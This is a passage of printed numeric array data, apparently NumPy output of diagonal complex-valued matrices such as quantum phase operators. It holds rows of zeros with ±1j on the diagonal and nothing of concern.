0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 1.j]]),
6: array([[0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
